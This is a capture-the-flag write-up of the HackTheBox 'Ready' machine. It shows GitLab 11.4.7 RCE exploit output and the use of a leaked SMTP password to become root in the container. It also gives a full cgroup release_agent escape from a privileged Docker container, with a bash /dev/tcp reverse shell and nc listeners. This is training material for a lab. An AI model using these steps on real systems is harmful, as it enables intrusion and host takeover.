HackTheBox - Ready write up
4 min read

HackTheBox - Ready write up

HackTheBox - Ready write up

Ready is a Medium Linux box.


As always, let's start with a nmap scan.

$ nmap -A -p- -oN scan.nmap

22/tcp   open  ssh     OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
|   256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_  256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open  http    nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile 
| /dashboard /projects/new /groups/new /groups/*/edit /users /help 
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

As you can see, there are two ports open, 22 for SSH and 5080 for Gitlab.


I register a user to find the version of Gitlab.

Gitlab CE v11.4.7


This version is vulnerable to RCE (Remote code execution), I use this exploit from Github.

$ python3 gitlab_rce.py
Gitlab Exploit by dotPY [insert fancy ascii art]
registering z5WS1NhskU:Gf7QvhGTUl - 200
Getting version of - 200
The Version seems to be 11.4.7! Choose wisely
delete user z5WS1NhskU - 200
[0] - GitlabRCE1147 - RCE for Version <=11.4.7
[1] - GitlabRCE1281LFIUser - LFI for version 10.4-12.8.1 and maybe more
[2] - GitlabRCE1281RCE - RCE for version 12.4.0-12.8.1 - !!RUBY REVERSE SHELL IS VERY UNRELIABLE!! WIP
type a number and hit enter to choose exploit: 0
Start a listener on port 42069 and hit enter (nc -vlnp 42069)
registering TxA6x9UnTK:mHVy6vTFkK - 200
hacking in progress - 200
delete user TxA6x9UnTK - 200
$ nc -lvnp 42069
Connection from
bash: cannot set terminal process group (507): Inappropriate ioctl for device
bash: no job control in this shell
git@gitlab:~/gitlab-rails/working$ id
uid=998(git) gid=998(git) groups=998(git)

We have a shell and the user.txt flag !

git@gitlab:/home/dude$ cat user.txt


We now are in docker.

$ ls -al /
total 108
drwxr-xr-x   1 root root 4096 Dec 24 18:30 .
drwxr-xr-x   1 root root 4096 Dec 24 18:30 ..
-rwxr-xr-x   1 root root    0 Dec  1 12:41 .dockerenv
git@gitlab:/tmp$ systemd-detect-virt

After some enumeration we can find some passwords in cleartext.

$ find / -name backup 2>/dev/null

$ ls -al /opt/backup
total 112
drwxr-xr-x 2 root root  4096 Dec  7 09:25 .
drwxr-xr-x 1 root root  4096 Dec  1 16:23 ..
-rw-r--r-- 1 root root   872 Dec  7 09:25 docker-compose.yml
-rw-r--r-- 1 root root 15092 Dec  1 16:23 gitlab-secrets.json
-rw-r--r-- 1 root root 79639 Dec  1 19:20 gitlab.rb

git@gitlab:/opt/backup$ grep password gitlab.rb
gitlab_rails['smtp_password'] = "wW59U!ZKMbG9+*#h"

git@gitlab:/tmp$ python3 -c "import pty;pty.spawn('/bin/bash')"
git@gitlab:/tmp$ su root
Password: wW59U!ZKMbG9+*#h


We are now root but, we are root of the docker, not the real host. We need to escape the docker.

root@gitlab:/opt/backup$ cat docker-compose.yml
version: '2.4'

    image: 'gitlab/gitlab-ce:11.4.7-ce.0'
    restart: always
    hostname: 'gitlab.example.com'
    privileged: true

As you can see, the gitlab docker is running in privileged mode. It means that all linux capabilities are activated. Thanks to that we can escape the docker and run command on the host.

Thanks to this article, I find two ways to escape a docker in privileged mode.

root@gitlab:/# mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x   
root@gitlab:/# echo 1 > /tmp/cgrp/x/notify_on_release
root@gitlab:/# host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:/# echo "$host_path/cmd" > /tmp/cgrp/release_agent
root@gitlab:/# echo '#!/bin/bash' > /cmd
root@gitlab:/# echo "bash -i >& /dev/tcp/ 0>&1" >> /cmd
root@gitlab:/# cat /cmd
bash -i >& /dev/tcp/ 0>&1
root@gitlab:/# chmod a+x /cmd
root@gitlab:/# sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
$ nc -lvnp 4444
Connection from
bash: cannot set terminal process group (-1): Inappropriate ioctl for device
bash: no job control in this shell
root@ready:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ready:/# cat /root/root.txt

Rooted !

Enjoying these posts? Subscribe for more